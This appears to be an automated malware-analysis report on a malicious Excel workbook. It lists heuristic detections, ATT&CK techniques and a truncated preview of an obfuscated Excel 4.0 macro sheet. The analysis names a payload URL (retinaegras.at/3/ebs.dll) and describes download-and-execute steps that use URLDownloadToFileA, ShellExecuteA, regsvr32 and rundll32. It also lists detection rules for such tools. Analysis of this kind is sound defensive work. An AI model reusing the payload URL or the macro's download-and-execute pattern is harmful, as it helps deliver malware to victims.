MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The file contains Excel 4.0 macros, indicated by the 'OOXML_XLM_MACROSHEET' and 'OOXML_XLM_DANGEROUS_FN' heuristics. These macros utilize functions like RUN, FORMULA, and WinAPI calls such as URLDownloadToFileA and ShellExecuteA to download and execute a payload from the URL 'https://retinaegras.at/3/ebs.dll'. The presence of 'regsvr32.exe' and 'rundll32.exe' in the document text further suggests execution of downloaded code.
Heuristics 7
-
Excel 4.0 macro sheet (1 sheet(s)) critical 3 related findings OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAMEWorkbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
-
Dangerous XLM formula APIs: RUN, FORMULA, REGISTER, HALT critical OOXML_XLM_DANGEROUS_FNExcel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
-
Binary XLM macro sheet with WinAPI/download strings critical OOXML_XLM_BINARY_WINAPI_STRINGSExcel 4.0 macro sheet is stored as BIFF12/XLSB binary data and contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 9 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://retinaegras.at/3/ebs.dll In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 86968 bytes |
SHA-256: 0e85bb43b71619568d81db30d0101046ed0c7237e9e2cb1b6b6a0efbf9f9658c |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:IO1999"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="5" spans="99:228" x14ac:dyDescent="0.25"><c r="HT5" t="b"><f>RUN($GV$1616)</f><v>0</v></c></row><row r="10" spans="99:228" x14ac:dyDescent="0.25"><c r="DN10" t="b"><f>RUN($DX$1447)</f><v>0</v></c></row><row r="16" spans="99:228" x14ac:dyDescent="0.25"><c r="CU16"><v>41</v></c></row><row r="21" spans="10:83" x14ac:dyDescent="0.25"><c r="V21"><v>9</v></c></row><row r="24" spans="10:83" x14ac:dyDescent="0.25"><c r="CE24" t="s"><v>18</v></c></row><row r="25" spans="10:83" x14ac:dyDescent="0.25"><c r="CE25" t="b"><f>RUN($DC$1293)</f><v>0</v></c></row><row r="26" spans="10:83" x14ac:dyDescent="0.25"><c r="AG26"><v>26</v></c></row><row r="27" spans="10:83" x14ac:dyDescent="0.25"><c r="BR27" t="s"><v>22</v></c></row><row r="28" spans="10:83" x14ac:dyDescent="0.25"><c r="J28" t="s"><v>11</v></c><c r="BR28" t="b"><f>RUN($GA$74)</f><v>0</v></c></row><row r="29" spans="10:83" x14ac:dyDescent="0.25"><c r="J29" t="b"><f>RUN($GO$1621)</f><v>0</v></c></row><row r="33" spans="7:249" x14ac:dyDescent="0.25"><c r="G33" t="b"><f>RUN($DO$213)</f><v>0</v></c></row><row r="34" spans="7:249" x14ac:dyDescent="0.25"><c r="AG34" t="s"><v>10</v></c></row><row r="35" spans="7:249" x14ac:dyDescent="0.25"><c r="AG35" t="b"><f>RUN($BY$641)</f><v>0</v></c><c r="CK35" t="b"><f>RUN($GV$1457)</f><v>0</v></c><c r="EM35" t="b"><f>RUN($FZ$139)</f><v>0</v></c><c r="ET35" t="s"><v>39</v></c></row><row r="36" spans="7:249" x14ac:dyDescent="0.25"><c r="ET36" t="b"><f>RUN($GI$90)</f><v>0</v></c></row><row r="39" spans="7:249" x14ac:dyDescent="0.25"><c r="DX39" t="b"><f>RUN($CY$160)</f><v>0</v></c><c r="FX39" t="s"><v>51</v></c></row><row r="41" spans="7:249" x14ac:dyDescent="0.25"><c r="IO41" t="s"><v>6</v></c></row><row r="42" spans="7:249" x14ac:dyDescent="0.25"><c r="IO42" t="b"><f>RUN($AG$1492)</f><v>0</v></c></row><row r="43" spans="7:249" x14ac:dyDescent="0.25"><c r="AN43" t="s"><v>44</v></c><c r="GD43"><v>2</v></c></row><row r="44" spans="7:249" x14ac:dyDescent="0.25"><c r="AN44" t="b"><f>RUN($AQ$1963)</f><v>0</v></c><c r="GD44" t="b"><f>RUN($II$1587)</f><v>0</v></c></row><row r="48" spans="7:249" x14ac:dyDescent="0.25"><c r="BP48" t="s"><v>13</v></c></row><row r="49" spans="35:245" x14ac:dyDescent="0.25"><c r="AI49" t="s"><v>9</v></c><c r="BP49" t="b"><f>RUN($GD$1761)</f><v>0</v></c></row><row r="50" spans="35:245" x14ac:dyDescent="0.25"><c r="AI50" t="b"><f>RUN($BW$261)</f><v>0</v></c></row><row r="52" spans="35:245" x14ac:dyDescent="0.25"><c r="CT52" t="s"><v>32</v></c></row><row r="53" spans="35:245" x14ac:dyDescent="0.25"><c r="CT53" t="b"><f>RUN($IB$1240)</f><v>0</v></c><c r="FA53" t="s"><v>0</v></c></row><row r="54" spans="35:245" x14ac:dyDescent="0.25"><c r="BB54" t="s"><v>50</v></c><c r="CE54" t="s"><v>47</v></c><c r="FA54" t="b"><f>RUN($GD$351)</f><v>0</v></c></row><row r="55" spans="35:245" x14ac:dyDescent="0.25"><c r="CE55" t="b"><f>RUN($GG$1768)</f><v>0</v></c></row><row r="60" spans="35:245" x14ac:dyDescent="0.25"><c r="IK60" t="s"><v>12</v></c></row><row r="61" spans="35:245" x14ac:dyDescent="0.25"><c r="GD61" t="b"><f>RUN($BM$1876)</f><v>0</v></c><c r="IK61" t="b"><f>RUN($FB$874)</f><v>0</v></c></row><row r="62" spans="35:245" x14ac:dyDescent="0.25"><c r="FB62" t="s"><v>26</v></c></row><row r="63" spans="35:245" x14ac:dyDescent="0.25"><c r="FB63" t="b"><f>RUN($CU$723)</f><v>0</v></c></row><row r="65" spans="12:245" x14ac:dyDescent="0.25"><c r="BM65"><v>707</v></c></row><row r="66" spans="12:245" x14ac:dyDescent="0.25"><c r="BM66 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.